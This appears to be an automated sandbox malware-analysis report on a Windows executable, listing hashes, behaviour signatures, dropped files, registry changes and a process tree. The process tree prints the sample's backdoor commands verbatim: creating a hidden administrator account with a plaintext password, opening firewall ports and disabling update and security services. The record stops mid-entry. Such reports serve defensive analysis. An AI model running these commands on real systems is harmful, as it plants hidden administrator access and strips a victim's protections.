Analysis
-
max time kernel
143s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30-11-2024 05:06
Behavioral task
behavioral1
Sample
b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe
-
Size
1.5MB
-
MD5
b4eab841d58d4dcd43923fc74e3613bb
-
SHA1
7245a6bc53f54fc0b42d62dbe0b9d0d64e0c5e83
-
SHA256
90791494c097ef09615aadcb8d6dde088e400f2d9b38bb6aef6a2c3d040b6ae2
-
SHA512
9d1042ebb4c2243babe658bdbcba7037a83a2da35ace6126924693b9b83b52dd9a1aaffa4b5804a4b111e1225a0dbf88d5ee81ad0e74e9a30a197333b71c4a16
-
SSDEEP
24576:fuNsvr8JXe4Di92MwUg38+8jX3V5qXYRmGnBia9fTi0gK8u5aPbOrddnNvfe:k7LMbR+8r3oYRfflRaP6dRRfe
Malware Config
Signatures
-
Modifies firewall policy service 3 TTPs 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List regedit.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3789:TCP = "3789:TCP:*:Enabled" regedit.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3789:TCP = "3789:UDP:*:Enabled" regedit.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List regedit.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List regedit.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\112:TCP = "112:TCP:*:Enabled" regedit.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\112:TCP = "112:UDP:*:Enabled" regedit.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List regedit.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" regedit.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4" regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2944 attrib.exe -
Executes dropped EXE 18 IoCs
pid Process 2776 Run.exe 2352 javavm.exe 2052 sc.exe 1772 sc.exe 2164 sc.exe 3060 sc.exe 1572 sc.exe 844 rgv.exe 2784 rgv.exe 696 rgv.exe 956 rgv.exe 2564 rgv.exe 2216 xnet.exe 1568 xnet.exe 1140 javavm.exe 1668 xnet.exe 1652 xnet.exe 2396 kill.exe -
Loads dropped DLL 64 IoCs
pid Process 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 2776 Run.exe 2776 Run.exe 2776 Run.exe 2604 cmd.exe 2604 cmd.exe 2604 cmd.exe 2352 javavm.exe 2352 javavm.exe 2604 cmd.exe 2604 cmd.exe 2052 sc.exe 2052 sc.exe 2604 cmd.exe 2604 cmd.exe 1772 sc.exe 1772 sc.exe 2604 cmd.exe 2604 cmd.exe 2164 sc.exe 2164 sc.exe 2604 cmd.exe 2604 cmd.exe 3060 sc.exe 3060 sc.exe 2604 cmd.exe 2604 cmd.exe 1572 sc.exe 1572 sc.exe 2604 cmd.exe 2604 cmd.exe 844 rgv.exe 844 rgv.exe 2604 cmd.exe 2604 cmd.exe 2784 rgv.exe 2784 rgv.exe 2604 cmd.exe 2604 cmd.exe 696 rgv.exe 696 rgv.exe 2604 cmd.exe 2604 cmd.exe 956 rgv.exe 956 rgv.exe 2604 cmd.exe 2604 cmd.exe 2564 rgv.exe 2564 rgv.exe 2604 cmd.exe 2604 cmd.exe 2216 xnet.exe 2216 xnet.exe 2604 cmd.exe 2604 cmd.exe 1568 xnet.exe 1568 xnet.exe 1140 javavm.exe 1140 javavm.exe 1140 javavm.exe 2604 cmd.exe 2604 cmd.exe 1668 xnet.exe -
Enumerates connected drives 3 TTPs 21 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\r: cmd.exe File opened (read-only) \??\u: cmd.exe File opened (read-only) \??\z: cmd.exe File opened (read-only) \??\g: cmd.exe File opened (read-only) \??\k: cmd.exe File opened (read-only) \??\y: cmd.exe File opened (read-only) \??\h: cmd.exe File opened (read-only) \??\q: cmd.exe File opened (read-only) \??\l: cmd.exe File opened (read-only) \??\o: cmd.exe File opened (read-only) \??\s: cmd.exe File opened (read-only) \??\t: cmd.exe File opened (read-only) \??\w: cmd.exe File opened (read-only) \??\e: cmd.exe File opened (read-only) \??\i: cmd.exe File opened (read-only) \??\n: cmd.exe File opened (read-only) \??\p: cmd.exe File opened (read-only) \??\v: cmd.exe File opened (read-only) \??\x: cmd.exe File opened (read-only) \??\j: cmd.exe File opened (read-only) \??\m: cmd.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Support = "0" regedit.exe -
resource yara_rule behavioral1/memory/2092-0-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/memory/2092-84-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/memory/844-146-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/844-148-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/2604-149-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/2784-151-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/696-153-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/956-156-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/2564-158-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/2604-223-0x0000000000400000-0x000000000041B000-memory.dmp upx behavioral1/memory/2396-225-0x0000000000400000-0x000000000041B000-memory.dmp upx -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\Java\classes\NPJava12.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\rgv.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\jpicpl32.cpl b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\TS.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\bin\jcov.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\xnet.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\hpi.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\java.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\fw2.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\telnet.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\tray.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\ts1.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\~DF1BDFB9CF.tmp b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\sc.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\fw2.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\Run.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\javavm.bat b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\jusched.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\jpicpl32.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\jpicpl32.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\jucheck.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\NPJava12.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\javavm.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\javavm.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\~DF2BDFB9CE.tmp b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\jucheck.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\javavm.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\jpicpl32.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\hpi.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\kill.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\xnet.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\NPJava11.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\fw1.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\fw1.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\jusched.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\jawt.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\rmi.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\java.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\java.ocx b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\java.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\nio.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\kill.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\tray.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\bin b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\rgv.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\sc.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\nio.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\bin\JavaVM.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\bin\jawt.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\bin\jawt.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\ javavm.exe File created C:\Windows\Java\classes\kill.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\java.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\NPJava11.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\javavm.bat b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\hide.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\java.ocx b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File created C:\Windows\Java\classes\jpicpl32.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\hide.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\kill.exe b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\TS.reg b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe File opened for modification C:\Windows\Java\classes\jawt.dll b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2052 sc.exe 1772 sc.exe 2164 sc.exe 3060 sc.exe 1572 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 47 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rgv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rgv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xnet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rgv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xnet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rgv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xnet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javavm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Run.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xnet.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language javavm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rgv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Time Discovery 1 TTPs 2 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1660 net.exe 1400 net1.exe -
Runs .reg file with regedit 10 IoCs
pid Process 1828 regedit.exe 1036 regedit.exe 3052 regedit.exe 2172 regedit.exe 2068 regedit.exe 2128 regedit.exe 1236 regedit.exe 1016 regedit.exe 3044 regedit.exe 2952 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1140 javavm.exe 2396 kill.exe 2396 kill.exe 2396 kill.exe 2396 kill.exe 2396 kill.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2396 kill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2776 Run.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2092 wrote to memory of 2776 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 30 PID 2092 wrote to memory of 2776 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 30 PID 2092 wrote to memory of 2776 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 30 PID 2092 wrote to memory of 2776 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 30 PID 2092 wrote to memory of 2776 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 30 PID 2092 wrote to memory of 2776 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 30 PID 2092 wrote to memory of 2776 2092 b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe 30 PID 2776 wrote to memory of 2604 2776 Run.exe 31 PID 2776 wrote to memory of 2604 2776 Run.exe 31 PID 2776 wrote to memory of 2604 2776 Run.exe 31 PID 2776 wrote to memory of 2604 2776 Run.exe 31 PID 2776 wrote to memory of 2604 2776 Run.exe 31 PID 2776 wrote to memory of 2604 2776 Run.exe 31 PID 2776 wrote to memory of 2604 2776 Run.exe 31 PID 2604 wrote to memory of 2068 2604 cmd.exe 33 PID 2604 wrote to memory of 2068 2604 cmd.exe 33 PID 2604 wrote to memory of 2068 2604 cmd.exe 33 PID 2604 wrote to memory of 2068 2604 cmd.exe 33 PID 2604 wrote to memory of 2068 2604 cmd.exe 33 PID 2604 wrote to memory of 2068 2604 cmd.exe 33 PID 2604 wrote to memory of 2068 2604 cmd.exe 33 PID 2604 wrote to memory of 2352 2604 cmd.exe 34 PID 2604 wrote to memory of 2352 2604 cmd.exe 34 PID 2604 wrote to memory of 2352 2604 cmd.exe 34 PID 2604 wrote to memory of 2352 2604 cmd.exe 34 PID 2604 wrote to memory of 2352 2604 cmd.exe 34 PID 2604 wrote to memory of 2352 2604 cmd.exe 34 PID 2604 wrote to memory of 2352 2604 cmd.exe 34 PID 2604 wrote to memory of 1660 2604 cmd.exe 35 PID 2604 wrote to memory of 1660 2604 cmd.exe 35 PID 2604 wrote to memory of 1660 2604 cmd.exe 35 PID 2604 wrote to memory of 1660 2604 cmd.exe 35 PID 2604 wrote to memory of 1660 2604 cmd.exe 35 PID 2604 wrote to memory of 1660 2604 cmd.exe 35 PID 2604 wrote to memory of 1660 2604 cmd.exe 35 PID 1660 wrote to memory of 1400 1660 net.exe 36 PID 1660 wrote to memory of 1400 1660 net.exe 36 PID 1660 wrote to memory of 1400 1660 net.exe 36 PID 1660 wrote to memory of 1400 1660 net.exe 36 PID 1660 wrote to memory of 1400 1660 net.exe 36 PID 1660 wrote to memory of 1400 1660 net.exe 36 PID 1660 wrote to memory of 1400 1660 net.exe 36 PID 2604 wrote to memory of 2692 2604 cmd.exe 37 PID 2604 wrote to memory of 2692 2604 cmd.exe 37 PID 2604 wrote to memory of 2692 2604 cmd.exe 37 PID 2604 wrote to memory of 2692 2604 cmd.exe 37 PID 2604 wrote to memory of 2692 2604 cmd.exe 37 PID 2604 wrote to memory of 2692 2604 cmd.exe 37 PID 2604 wrote to memory of 2692 2604 cmd.exe 37 PID 2692 wrote to memory of 2848 2692 net.exe 38 PID 2692 wrote to memory of 2848 2692 net.exe 38 PID 2692 wrote to memory of 2848 2692 net.exe 38 PID 2692 wrote to memory of 2848 2692 net.exe 38 PID 2692 wrote to memory of 2848 2692 net.exe 38 PID 2692 wrote to memory of 2848 2692 net.exe 38 PID 2692 wrote to memory of 2848 2692 net.exe 38 PID 2604 wrote to memory of 2136 2604 cmd.exe 39 PID 2604 wrote to memory of 2136 2604 cmd.exe 39 PID 2604 wrote to memory of 2136 2604 cmd.exe 39 PID 2604 wrote to memory of 2136 2604 cmd.exe 39 PID 2604 wrote to memory of 2136 2604 cmd.exe 39 PID 2604 wrote to memory of 2136 2604 cmd.exe 39 PID 2604 wrote to memory of 2136 2604 cmd.exe 39 PID 2136 wrote to memory of 1636 2136 net.exe 40 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2944 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\b4eab841d58d4dcd43923fc74e3613bb_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\Java\classes\Run.exe"C:\Windows\Java\classes\Run.exe" -h javavm.bat2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\cmd.execmd /c javavm.bat3⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\regedit.exeregedit /s javavm.reg4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:2068
-
-
C:\Windows\Java\classes\javavm.exeC:\Windows\Java\classes\javavm.exe -i4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2352
-
-
C:\Windows\SysWOW64\net.exenet user Support f*ck!n_h3ll /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES4⤵
- System Location Discovery: System Language Discovery
- System Time Discovery
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Support f*ck!n_h3ll /ADD /EXPIRES:NEVER /PASSWORDREQ:YES /TIMES:ALL /ACTIVE:YES5⤵
- System Location Discovery: System Language Discovery
- System Time Discovery
PID:1400
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administrators Support /add4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators Support /add5⤵
- System Location Discovery: System Language Discovery
PID:2848
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administrators Support /add4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrators Support /add5⤵
- System Location Discovery: System Language Discovery
PID:1636
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Administratoren Support /add4⤵
- System Location Discovery: System Language Discovery
PID:1668 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratoren Support /add5⤵
- System Location Discovery: System Language Discovery
PID:1416
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administrat÷rer Support /add4⤵
- System Location Discovery: System Language Discovery
PID:1652 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administrat÷rer Support /add5⤵
- System Location Discovery: System Language Discovery
PID:2504
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup administradores Support /add4⤵
- System Location Discovery: System Language Discovery
PID:572 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administradores Support /add5⤵
- System Location Discovery: System Language Discovery
PID:1056
-
-
-
C:\Windows\SysWOW64\net.exenet user Support /comment:"Built-in account for administering the computer/domain"4⤵
- System Location Discovery: System Language Discovery
PID:2664 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Support /comment:"Built-in account for administering the computer/domain"5⤵
- System Location Discovery: System Language Discovery
PID:2824
-
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited4⤵
- System Location Discovery: System Language Discovery
PID:1516 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited5⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +a +s +h C:\docume~1\Support4⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2944
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s hide.reg4⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:2128
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s fw1.reg4⤵
- Modifies firewall policy service
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:1236
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s fw2.reg4⤵
- Modifies firewall policy service
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:1828
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s telnet.reg4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:1016
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s kill.reg4⤵
- Modifies security service
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:1036
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s tray.reg4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:3052
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s TS.reg4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:3044
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s ts1.reg4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:2172
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s ts.reg4⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:2952
-
-
C:\Windows\Java\classes\sc.exesc config javavm error= ignore4⤵
- Executes dropped EXE
- Loads dropped DLL
- Launches sc.exe
- System Location Discovery: System Language Discovery
